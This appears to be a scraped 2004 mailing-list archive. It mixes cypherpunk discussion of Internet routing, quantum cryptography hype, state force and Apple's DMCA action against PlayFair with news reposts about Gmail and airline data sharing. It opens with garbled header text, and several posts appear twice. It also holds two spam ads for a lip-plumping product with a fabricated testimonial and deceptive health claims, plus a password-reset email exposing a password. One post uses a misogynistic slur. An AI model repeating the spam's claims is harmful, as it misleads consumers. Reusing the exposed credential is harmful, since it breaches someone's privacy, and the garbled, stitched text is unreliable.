9 h} h+d; h+d; l To: =?koi8-r?B?5MXNyc7V?= Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?= Date: Tue, 6 Apr 2004 23:43:08 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Re[9]: , , , , , ,
9 h} h+d; h+d; l To: =?koi8-r?B?5MXNyc7V?= Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?= Date: Tue, 6 Apr 2004 23:43:08 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Symantec AVF detected an unrepairable virus in a message you sent
Subject of the message: Does it matter? Recipient of the message: Customer Service
Fornicalia Lawmaker Moves to Block Gmail
SAN FRANCISCO (Reuters) - A California state senator on Monday said she was drafting legislation to block Google Inc.'s free e-mail service Gmail because it would place advertising in personal messages after searching them for key words. http://news.yahoo.com/news?tmpl=storyu=/nm/20040412/wr_nm/tech_google_dc_1 A private interaction between two consenting parties has absolutely nothing to do with the state, period. The bitch supporting this shit should be removed from office forthwith. -- Riad Wahby [EMAIL PROTECTED] MIT VI-2 M.Eng
Re: Fornicalia Lawmaker Moves to Block Gmail
Riad S. Wahby wrote: SAN FRANCISCO (Reuters) - A California state senator on Monday said she was drafting legislation to block Google Inc.'s free e-mail service Gmail because it would place advertising in personal messages after searching them for key words. Is she planning to block all the advertising supported email services, just those associated with search engines, or just those who actually try to make the ads relevent?
Modern Miracles Take Years Off Your Face!
B'eauty Secrets Newsletter By: Jamie Anderton - Freelance Writer & B'eauty Expert Better than Lip I'njections? Have you ever wanted to get c'ollagen i'njections? My research found an excellent pain free option for you ladies that dont want to spend thousands of dollars on surgery Dear Jamie, Have you ever heard of C'ity L'ips? One of my girlfriends uses it constantly and she swears up and down that it has really made her lips bigger after just a few short weeks. Ive wanted to get c'ollagen i'njections for years but its so expensive. Do you think C'ity L'ips will make my lips fuller? Amber DaviesNewport Beach, CA Well Amber, I personally interviewed a world renowned biochemist who developed the C'ity L'ips formula. I walked away from that interview with a new respect for modern c'osmetics. C'ity L'ips convinced me that they have the most advanced C'ollagen Building T'reatment available that is different than any other product on the market today claiming to be a "lip p'lumper". C'ity L'ips uses a unique Oligopept'ide Technology that stimulates lips to increase production of their own c'ollagen and hy'alonuronic acid. C'ity L'ips then adds C'eladrol to protect the new c'ollagen from breakdown. C'eladrol is also a patented anti-inflammatory. How can an anti-inflammatory help plump your lips? Thats exactly what I asked! C'eladrol helps retain moisture and repair damaged tissue, making your lips full and healthy. He also pointed out that other lip p'lumpers have harsh spices that irritate your lips and inflame them. C'ity L'ips actually builds c'ollagen, making your lips grow! SAVE THIS ARTICLE ::: C'ity L'ips impressed me with the shocking revelation that they have had less than a 1% return rate on their Lip P'lumping T'reatment! C'ity L'ips is Guaranteed to work or your Money Back. C'ity L'ips is an International company that has customers in 74 countries. Movie stars, celebrities, doctors, and people of all walks of life use C'ity L'ips everyday They must be doing something right!C'ity L'ips is a highly effective and inexpensive alternative to c'ollagen i'njections. More Details HERE... Jamie Anderton Laugh and grow fat. A drowning man will clutch at a straw whilst the cat'S away, the mice will play laugh and grow fat in for a penny, in for a pound children should be seen and not heard least said, soonest mended a miss is as good as a mile the early bird catches the worm familiarity breeds contempt laugh and grow fat. Charity begins at home a friend in need is a friend indeed pride goes before a fall forbidden fruit tastes sweeter there are none so deaf as those who will not hear charity begins at home many hands make light work every dog has its day don'T count your chickens before they hatch pride goes before a fall. Don'T put all your eggs in one basket.
Better Than Collagen Lip Injections?
B'eauty Secrets Newsletter By: Jamie Anderton - Freelance Writer & B'eauty Expert Better than Lip I'njections? Have you ever wanted to get c'ollagen i'njections? My research found an excellent pain free option for you ladies that dont want to spend thousands of dollars on surgery Dear Jamie, Have you ever heard of C'ity L'ips? One of my girlfriends uses it constantly and she swears up and down that it has really made her lips bigger after just a few short weeks. Ive wanted to get c'ollagen i'njections for years but its so expensive. Do you think C'ity L'ips will make my lips fuller? Amber DaviesNewport Beach, CA Well Amber, I personally interviewed a world renowned biochemist who developed the C'ity L'ips formula. I walked away from that interview with a new respect for modern c'osmetics. C'ity L'ips convinced me that they have the most advanced C'ollagen Building T'reatment available that is different than any other product on the market today claiming to be a "lip p'lumper". C'ity L'ips uses a unique Oligopept'ide Technology that stimulates lips to increase production of their own c'ollagen and hy'alonuronic acid. C'ity L'ips then adds C'eladrol to protect the new c'ollagen from ! breakdown. C'eladrol is also a patented anti-inflammatory. How can an anti-inflammatory help plump your lips? Thats exactly what I asked! C'eladrol helps retain moisture and repair damaged tissue, making your lips full and healthy. He also pointed out that other lip p'lumpers have harsh spices that irritate your lips and inflame them. C'ity L'ips actually builds c'ollagen, making your lips grow! SAVE THIS ARTICLE ::: C'ity L'ips impressed me with the shocking revelation that they have had less than a 1% return rate on their Lip P'lumping T'reatment! C'ity L'ips is Guaranteed to work or your Money Back. C'ity L'ips is an International company that has customers in 74 countries. Movie stars, celebrities, doctors, and people of all walks of life use C'ity L'ips everyday They must be doing something right!C'ity L'ips is a highly effective and inexpensive alternative to c'ollagen i'njections. More Details HERE... Jamie Anderton A rolling stone gathers no moss. Forbidden fruit tastes sweeter. Two heads are better than one. Whilst the cat'S away, the mice will play. Great minds think alike. A friend in need is a friend indeed. Still waters run deep. Don'T count your chickens before they hatch. Too many cooks spoil the broth. Empty vessels make most noise.
American Airlines is an info whore too
American Airlines admits disclosing passenger data WASHINGTON (AFP) - A contractor for American Airlines has admitted to sharing personal passenger information with the US government and other companies, thrusting the world's largest carrier into a bitter controversy over rights to privacy in the post-September 11 world. The disclosure, certain to alarm civil libertarians, made American the third leading US airline caught disseminating private data behind the back of its customers in the name of fighting terrorism. snip http://news.yahoo.com/news?tmpl=storycid=1521u=/afp/20040411/pl_afp/us_attacks_air_040411224313printer=1
Re: On Killing Blaster
At 04:26 PM 4/11/04 -0400, Tyler Durden wrote: When faced with force, you reply with force when you can. Nah. This isn't even true in a fistfight, except when the guy you're fighting is a) significantly smaller than you, and b) less trained. More often than not, if someone attacks you, it's because they either have or perceive themselves to have an overwhelmingly superior force. See asymetric warfare Sometimes a stronger adversary decides its not worth it. See Lebanon and a few hundred dead Marines. See Vietnam. (Speaking of which, I heard McCain arguing that if we leave .iq the place becomes a hotbed of 'terrorism'. Anyone remember the Domino theory?) And of course, if it's possible to diarm your opponent without actually killing or maiming him, that's sometimes far more appropriate... No, then he'll sue you. As someone said better than myself, Crypto is one little tool in an aresenal against Men with Guns...in the end Men With Guns will probably try to shoot away bits, but it's not going to work too well. You forget that there are no bits which are not physical. Physical things reside on land leased from the State (try not paying your real estate taxes). All cables make a landing somewhere. Meanwhile, P2P, WiFi, Crypto,and lots of other stuff will slowly start to chip away at things on the edges, until the core is exposed. Where are you going to buy your hardware from, that it can't be shut down? How are you going to hide your TX from the DXing white vans?
washingtonpost.com Account Request
Dear [EMAIL PROTECTED], As you requested, this e-mail provides your User ID and a reset password for the washingtonpost.com site. The new password is provided for your security. 1) Note your User ID and reset password. [EMAIL PROTECTED] ZqKkNkyx 2) Click the link below and follow the instructions provided to sign-in and change your password. http://www.washingtonpost.com/ac2/wp-dyn?node=admin/registration/managedestination=passwordnextstep=update (If the link is not clickable, you can copy and paste the link into your web browser address window.) If you have any questions or comments, please visit our Customer Care Center. Please do not reply directly to this message. Customer Care washingtonpost.com If you did not request this information from washingtonpost.com, someone has mistakenly entered your e-mail address when requesting a new password. Please ignore this message or click the url above to select a new password for your account. To protect your privacy, we will only send this information to the e-mail address provided for this account.
Optimice el rendimiento de su PC en minutos
(Al final del mensaje hay información sobre cómo borrarse de la lista.) Optimice la velocidad de su PC PC Booster contiene todos los secretos para hacer más rápido su equipo en minutos, ¡sin tener que invertir en hardware adicional! Descárguelo ahora Instálelo y relájese: PC Booster hace todo el trabajo Estabiliza su PC y evita bloqueos Inicia y apaga Windows más rápido No hay que ser un experto en PC Descargue PC Booster hoy mismo Ha recibido este mensaje porque ha descargado RealOne, RealPlayer o RealJukebox de Real.com y ha solicitado que le enviemos información sobre los productos, actualizaciones y ofertas especiales de RealNetworks. Si no desea recibir ningún otro mensaje, haga clic en el enlace borrarse de abajo. Política de confidencialidad | Borrarse RealOne, RealNetworks, RealPlayer, RealJukebox y Real.com son marcas comerciales o registradas de RealNetworks, Inc. Todas las demás empresas o productos que aparecen en este documento son marcas comerciales o registradas de sus respectivos propietarios.
Geodesic markets for nuclear secrets
The price of nuclear secrets has been dropping rapidly: http://theonion.com/news/index.php?issue=4014 WASHINGTON, DC Top-secret information about the design, construction, and delivery of nuclear weapons has never been more affordable than it is today, CIA Director George Tenet announced Monday. (ok, ok, so it's the Onion... It's still geodesic markets at work, even if it's all made up :-) --- Bill Stewart [EMAIL PROTECTED]
Re: Hierarchy, Force Monopoly, and Geodesic Societies
On Sun, 11 Apr 2004, sunder wrote: The term is used because most or all trees in the region where the English language originated are shaped just like that: they have a single trunk which forks into branches which may themselves fork and so on. These branches do not connect back to one another. I believe the real issue here is one of being able to stretch your mind into seeing things from different points of view. This is the reason I brought in the quasi-mystical quote about the sphere whose center is everywhere. Someone comes to me and says: the Internet is a tree. Then he points me at a graph of inter-AS (Autonomous System) connections to illustrate his point. That graph includes all of those seemingly redundant connections that make it _not_ a tree. These seemingly redundant connections are in fact a high proportion of all connections. That is to say, the graph is accurate and his statement wasn't. You can see the Internet in many ways. You can run a single traceroute and see it as a line. You can ping broadcast on your LAN and see it as a chorus line. If you understand what you are looking at, you can run traceroutes and see stable rings: hot potato routing at work, where the packets go out one way and come back another. Then again, I have spoken to hundreds? thousands? of people who think that the Internet _is_ the World Wide Web. Let's explain why we have multiple connections and what types of these you can expect. There are two common types of multiple connections: A) Two links to the same ISP: In terms of redundancy for the purposes of being fault tolerant, only one of the multiple links is ever used. With You don't understand and you are quite wrong. If one AS has more than one link to another AS, there are often very good reasons for it, and both links are used. If network A peers with network B in both Paris and New York, both will generally dump traffic for the other network at the nearest connection. Why? Well, on the one hand, there is no reason to carry packets originating in Paris and destined for a host in Paris all the way to New York. On the other hand, many or most networks employ hot potato routing, meaning that if network A picks up a packet for network B in Paris, it dumps it on network B as soon as it can, to minimize costs, wherever the destination might be. Some networks, concerned with quality of service, adopt the opposite strategy, and carry packets as far as possible within their own network. most ISP's, when you negotiate a contract for a backup connection, it's with the understanding that you'll only use it when the main one goes down. I don't think that you have any evidence for this assertion about what characterizes 'most' backup agreements. I do know that most networks regard this sort of statistical information as highly confidential. B) You have multiple connections to different ISP's (possibly with peering contracts, etc.) In this case when a node at your location tries to contact some other node on the internet, it's traffic doesn't go over ALL of your connections - it takes only a single path. [Ok, if your routers are correcting for an outage, then perhaps you'll see different paths being taken, but this is just the routing tables/routers settling or converging.] The world is more complicated than this. Much more. If both case A and case B, a single node in your location will see the entire internet as a tree with the root of that tree being the default gateway. (i.e. go back to doing traceroutes.) In the case of a multi-homed machine, or machine that participates in routing, it itself becomes the root of the tree. There are tens of thousands of machines on the Internet that don't have a default gateway. Machines that participate in backbone routing have multiple connections and aren't the root of a tree in any normal sense of the word. There is no parent-child relationship between such routers: they are peers. These peers participate in a highly complex graph which dances continuously. The result is that routing has a large stochastic component: if you can understand what you are looking at, you often see traceroutes involving packets jumping sometimes one way, sometimes another. To make things even more difficult to understand, an increasing amount of traffic flows through MPLS tunnels, which are invisible to traceroutes. Once you eliminate cycles, and you do so in real life, you go back to a tree. You only see the alternate paths used when failover or routing errors occur. This just isn't true. Hot potato routing is the most easily understood example: traffic goes out one way and back another. It does this because the ASs involved have set their policy that way. Backbone routers have lots of knobs to configure traffic flow. Some of these allow you to throttle it, some allow you to split flows according to traffic type, some allow to to split flows statistically, some allow you to
Re: On Needing Killing (Orwell was an optimist)
At 07:20 PM 4/11/04 +, Justin wrote: Major Variola (ret) (2004-04-11 16:42Z) wrote: Blacknet is a robust archive for words, immune to force (by State or private actors), but merely words. With all due respect to the principle of freedom of speech and all that, I think that cypherpunks, and people in general, give far too little respect to words, as if words are a vague, unimportant, and remote link in the chain of causation of acts or failure-to-acts. I don't see anything wrong with Orwell's view that words control the future's view of history. His certainly have. Language is how you manipulate people from a distance. Much more convenient than hitting them. Crypto *can* keep bits free. And so maybe language. But Men with Guns control physical reality, which limits what those bits can do. Read the archives on the problems with linking credits to dollars or physical merchandise. Note that the Saudis are organizing conferences on registering and recording hawala. Note that the US will kidnap (mexican MD for instance) if they can't extradite. And how many will run a prohibited node when the penalty is watching your family assets seized, family members raped, before your eyes are gouged out? --- It can't happen here -Suzy Creamcheese
Re: On Killing Blaster
At 04:26 PM 4/11/04 -0400, Tyler Durden wrote: When faced with force, you reply with force when you can. Nah. This isn't even true in a fistfight, except when the guy you're fighting is a) significantly smaller than you, and b) less trained. More often than not, if someone attacks you, it's because they either have or perceive themselves to have an overwhelmingly superior force. See asymetric warfare Sometimes a stronger adversary decides its not worth it. See Lebanon and a few hundred dead Marines. See Vietnam. (Speaking of which, I heard McCain arguing that if we leave .iq the place becomes a hotbed of 'terrorism'. Anyone remember the Domino theory?) And of course, if it's possible to diarm your opponent without actually killing or maiming him, that's sometimes far more appropriate... No, then he'll sue you. As someone said better than myself, Crypto is one little tool in an aresenal against Men with Guns...in the end Men With Guns will probably try to shoot away bits, but it's not going to work too well. You forget that there are no bits which are not physical. Physical things reside on land leased from the State (try not paying your real estate taxes). All cables make a landing somewhere. Meanwhile, P2P, WiFi, Crypto,and lots of other stuff will slowly start to chip away at things on the edges, until the core is exposed. Where are you going to buy your hardware from, that it can't be shut down? How are you going to hide your TX from the DXing white vans?
my periodic rant on quantum crypto
--- begin forwarded text Delivered-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: my periodic rant on quantum crypto From: Perry E. Metzger [EMAIL PROTECTED] Date: Mon, 12 Apr 2004 15:37:33 -0400 Sender: [EMAIL PROTECTED] /. is running yet another story on quantum cryptography today, with the usual breathless hype: http://science.slashdot.org/article.pl?sid=04/04/12/133623 I'm especially unimpressed with the Does this spell the end of the field of cryptography? comment. For those who don't know much about what it is, Quantum Cryptography is a very expensive way of producing an unauthenticated link encryption device. It is useless for any application other than link encryption over a short distance and requires a dedicated optical fiber to work. QC has no properties that render it especially better for link encryption than, say, a box from one of several vendors running AES on the link instead. It is perhaps theoretically safer, but in practice no one is going to break AES either -- they're going to bribe the minimum wage guard at your colo to have 20 minutes alone with your box while they install a tap on the clear side of it (or worse, they'll slip in while the guard is asleep at his desk.) QC still requires link authentication (lest someone else other than the people you think you're talking to terminate your fiber instead). As a result of this, you can't really get rid of key management, so QC isn't going to buy you freedom from that. QC can only run over a dedicated fiber over a short run, where more normal mechanisms can work fine over any sort of medium -- copper, the PSTN, the internet, etc, and can operate without distance limitation. QC is fiendishly costly -- orders of magnitude more expensive than an AES based link encryption box. QC is extremely hard to test to assure there are no hardware or other failures -- given the key in use, I can use intercepted traffic to assure my AES link encryption box is working correctly, but I have no such mechanism for a QC box. On top of all of this, the real problems in computer security these days have nothing to do with stuff like how your link encryption box works and everything to do with stuff like buffer overflows, bad network architecture, etc. Given that what we're dealing with is a very limited technology that for a very high price will render you security that is at best not particularly better than what much more economical solutions will yield, why do people keep hyping this? Indeed, why do people buy these boxes, if indeed anyone is buying them? It is stunning that a lab curiosity continues to be mentioned over and over again, not to mention to see venture capitalists dump money after it. BTW, none of this has anything to do with Quantum Computing, which may indeed yield breakthroughs someday in areas such as factoring but which is totally unrelated... Perry - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED] --- end forwarded text -- - R. A. Hettinga mailto: [EMAIL PROTECTED] The Internet Bearer Underwriting Corporation http://www.ibuc.com/ 44 Farquhar Street, Boston, MA 02131 USA ... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience. -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
nettime PlayFair Sarovar
--- begin forwarded text To: nettime [EMAIL PROTECTED] From: kevin lahoda [EMAIL PROTECTED] Subject: nettime PlayFair Sarovar Date: Sat, 10 Apr 2004 14:51:11 -0400 Sender: [EMAIL PROTECTED] Reply-To: kevin lahoda [EMAIL PROTECTED] Sarovar.org is India's first portal to host projects under Free/Open source licenses. It is located in Trivandrum, India and hosted at Asianet data center. Sarovar.org is customised, installed and maintained by Linuxense as part of their community services and sponsored by River Valley Technologies. From Sarovar's http://sarovar.org/ Latest News: After a short vacation thanks to a Cease and Desist letter from Apple, we're back online. Many thanks to Sarovar for hosting us.. -PlayFair Sarovar now hosts The PlayFair project http://playfair.sarovar.org/ which SourceForge has declined in order to avoid tangling with Apple's decision to go DMCA on their ass http://slashdot.org/article.pl?sid=04/04/09/1554203 . Like something from a Gibson novel, I wouldn't doubt if Sarovar rises to meet more than another of these occasions in the near future. And so, we have more contentious open source code hosted outside of the US in order to circumvent unfavorable legal processes. Offtshoring in itself is not all that new (another example: http://www.citi.umich.edu/u/provos/honeyd/ ). Here is how this one gets interesting: A big guy - Apple, goes a little sour, another (kind of) big guy - SourceForge, takes the easy route, and then an offshore repository stands in. With all of this, one thing that should not be ignored is that SourceForge should be shamed for not holding itself stronger. In a way SourceForge's decline of PlayFair and non-usage of the Safe Harbor Provision Act http://www.chillingeffects.org/dmca512/ is an admit of defeat and a failure to stand up for one's (community's) rights. What comes out of this? Well, maybe Apple wins because they avoid a chance of being tarnished. Imagine what consumer level acknowledgment of the reality of Apple marketing a clean yet gritty 'Garage Band' motif (with all that punk rock implies) while at the same time sleeping with DRM, recently RIAA, and now DMCA, could entail... One can easily see that Apple is dancing itself into a bit of a gamble. But then again, what does an Ipod zombie care about these acronyms anyway? What does SourceForge get? Not much. This only makes it easier for them to weasle out of the next situation that comes up. Not to mention they also missed a good chance to join PlayFair in telling Apple what's what. k http://sarovar.org/ http://sarovar.org/projects/playfair/ http://slashdot.org/article.pl?sid=04/04/09/1554203 http://www.chillingeffects.org/dmca512/ http://www.citi.umich.edu/u/provos/honeyd/ http://www.theregister.co.uk/2004/04/09/playfair_dmca_takedown/ # distributed via nettime: no commercial use without permission # nettime is a moderated mailing list for net criticism, # collaborative text filtering and cultural politics of the nets # more info: [EMAIL PROTECTED] and info nettime-l in the msg body # archive: http://www.nettime.org contact: [EMAIL PROTECTED] --- end forwarded text -- - R. A. Hettinga mailto: [EMAIL PROTECTED] The Internet Bearer Underwriting Corporation http://www.ibuc.com/ 44 Farquhar Street, Boston, MA 02131 USA ... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience. -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
Re: nettime PlayFair Sarovar
The GNU-Darwin Distribution is taking a stand against what Apple has done, and we have blackened our website so that people will take notice. http://www.gnu-darwin.org/ MacNN is also running a story about it, and it is interesting that Apple has sometimes used the DMCA to threaten them as well. http://www.macnn.com/news/24175 There are some discussion threads about it, although most messages are still in the queue and not yet visible. http://sourceforge.net/mailarchive/forum.php?forum_id=6042 Here is a link to the original post. http://sourceforge.net/forum/forum.php?forum_id=367147 Regards, proclus http://www.gnu-darwin.org/ On 12 Apr, R. A. Hettinga wrote: --- begin forwarded text To: nettime [EMAIL PROTECTED] From: kevin lahoda [EMAIL PROTECTED] Subject: nettime PlayFair Sarovar Date: Sat, 10 Apr 2004 14:51:11 -0400 Sender: [EMAIL PROTECTED] Reply-To: kevin lahoda [EMAIL PROTECTED] Sarovar.org is India's first portal to host projects under Free/Open source licenses. It is located in Trivandrum, India and hosted at Asianet data center. Sarovar.org is customised, installed and maintained by Linuxense as part of their community services and sponsored by River Valley Technologies. From Sarovar's http://sarovar.org/ Latest News: After a short vacation thanks to a Cease and Desist letter from Apple, we're back online. Many thanks to Sarovar for hosting us.. -PlayFair Sarovar now hosts The PlayFair project http://playfair.sarovar.org/ which SourceForge has declined in order to avoid tangling with Apple's decision to go DMCA on their ass http://slashdot.org/article.pl?sid=04/04/09/1554203 . Like something from a Gibson novel, I wouldn't doubt if Sarovar rises to meet more than another of these occasions in the near future. And so, we have more contentious open source code hosted outside of the US in order to circumvent unfavorable legal processes. Offtshoring in itself is not all that new (another example: http://www.citi.umich.edu/u/provos/honeyd/ ). Here is how this one gets interesting: A big guy - Apple, goes a little sour, another (kind of) big guy - SourceForge, takes the easy route, and then an offshore repository stands in. With all of this, one thing that should not be ignored is that SourceForge should be shamed for not holding itself stronger. In a way SourceForge's decline of PlayFair and non-usage of the Safe Harbor Provision Act http://www.chillingeffects.org/dmca512/ is an admit of defeat and a failure to stand up for one's (community's) rights. What comes out of this? Well, maybe Apple wins because they avoid a chance of being tarnished. Imagine what consumer level acknowledgment of the reality of Apple marketing a clean yet gritty 'Garage Band' motif (with all that punk rock implies) while at the same time sleeping with DRM, recently RIAA, and now DMCA, could entail... One can easily see that Apple is dancing itself into a bit of a gamble. But then again, what does an Ipod zombie care about these acronyms anyway? What does SourceForge get? Not much. This only makes it easier for them to weasle out of the next situation that comes up. Not to mention they also missed a good chance to join PlayFair in telling Apple what's what. k http://sarovar.org/ http://sarovar.org/projects/playfair/ http://slashdot.org/article.pl?sid=04/04/09/1554203 http://www.chillingeffects.org/dmca512/ http://www.citi.umich.edu/u/provos/honeyd/ http://www.theregister.co.uk/2004/04/09/playfair_dmca_takedown/ # distributed via nettime: no commercial use without permission # nettime is a moderated mailing list for net criticism, # collaborative text filtering and cultural politics of the nets # more info: [EMAIL PROTECTED] and info nettime-l in the msg body # archive: http://www.nettime.org contact: [EMAIL PROTECTED] --- end forwarded text -- Visit proclus realm! http://proclus.tripod.com/ -BEGIN GEEK CODE BLOCK- Version: 3.1 GMU/S d+@ s: a+ C UBULI$ P+ L+++() E--- W++ N- !o K- w--- !O M++@ V-- PS+++ PE Y+ PGP-- t+++(+) 5+++ X+ R tv-(--)@ b !DI D- G e h--- r+++ y --END GEEK CODE BLOCK-- pgp0.pgp Description: PGP signature
Re: nettime PlayFair Sarovar
On 12 Apr, To: R. A. Hettinga wrote: http://sourceforge.net/mailarchive/forum.php?forum_id=6042 Ahh, that link just dropped ;-}. Here is another. http://www.advogato.org/article/764.html Regards, proclus http://www.gnu-darwin.org/ -- Visit proclus realm! http://proclus.tripod.com/ -BEGIN GEEK CODE BLOCK- Version: 3.1 GMU/S d+@ s: a+ C UBULI$ P+ L+++() E--- W++ N- !o K- w--- !O M++@ V-- PS+++ PE Y+ PGP-- t+++(+) 5+++ X+ R tv-(--)@ b !DI D- G e h--- r+++ y --END GEEK CODE BLOCK-- pgp0.pgp Description: PGP signature